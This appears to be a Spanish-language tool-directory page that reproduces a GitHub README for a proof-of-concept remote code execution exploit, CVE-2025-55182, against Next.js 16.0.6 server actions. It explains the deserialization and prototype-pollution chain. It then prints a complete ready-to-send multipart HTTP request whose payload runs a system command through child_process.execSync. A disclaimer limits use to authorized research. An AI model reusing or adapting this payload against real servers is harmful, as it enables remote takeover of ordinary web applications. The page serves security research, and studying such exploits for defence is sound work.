Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-RCE-Exploit — Más enfocado en exploits; ideal para repositorios de investigación en seguridad. | Kitploit
Herramientas/GitHubGitHub/orgito1015/cve-2025-55182-rce-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPapers e InvestigaciónAprendizaje y EducaciónDesarrollo de Payloads
GitHuborgito1015/cve-2025-55182-rce-exploit

CVE-2025-55182-RCE-Exploit

Más enfocado en exploits; ideal para repositorios de investigación en seguridad.

Ver Repositorio
2hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

POC para CVE-2025-55182 – Ejecución Remota de Código en Next.js 16.0.6

Este repositorio contiene un proof-of-concept (POC) funcional para CVE-2025-55182, una vulnerabilidad crítica de deserialización que afecta a Next.js 16.0.6. El exploit abusa de la deserialización de chunks $@ y de Chunk.prototype.then para obtener control total sobre el proceso de resolución de chunks y lograr ejecución arbitraria de código (RCE) en el servidor.

Resumen de la Vulnerabilidad

Next.js utiliza objetos Chunk internos y un mecanismo de streaming/deserialización para las acciones del servidor. Abusando de $@ para deserializar una referencia de Chunk e inyectando Chunk.prototype.then en el objeto raíz, un atacante puede:

  • Forzar a Next.js a llamar a then(...) con un controlado por el atacante
this
  • Establecer el status del chunk en resolved_model
  • Desencadenar initializeModelChunk con un chunk falso completamente controlado por el atacante
  • Abusar de los métodos chunk._response para alcanzar comportamientos internos peligrosos
  • El objetivo final es desencadenar la deserialización de Blob, que ejecuta una llamada como:

    root@kitploit:~
    response._formData.get(response._prefix)
    

    Al establecer response._formData.get = Function y colocar código arbitrario en response._prefix, el atacante puede ejecutar comandos arbitrarios del sistema.

    POC del Exploit

    La solicitud HTTP en poc/CVE-2025-55182.http demuestra el exploit contra Next.js 16.0.6 ejecutándose localmente, lanzando xcalc mediante child_process.execSync:

    root@kitploit:~
    POST / HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
    Next-Action: x
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Length: 459
    
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="0"
    
    {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="1"
    
    "$@0"
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
    

    Estructura del Repositorio

    root@kitploit:~
    /
    ├── README.md
    ├── DISCLAIMER.md
    ├── poc/
    │   └── CVE-2025-55182.http
    └── analysis/
        └── exploitation-notes.md
    

    Descargo de responsabilidad

    Este proyecto se proporciona estrictamente solo con fines educativos y de investigación. NO use este exploit en ningún sistema que no posea o para el que no tenga permiso explícito por escrito para realizar pruebas.

    El autor no asume ninguna responsabilidad por cualquier uso indebido o daño causado.

    Descargar herramienta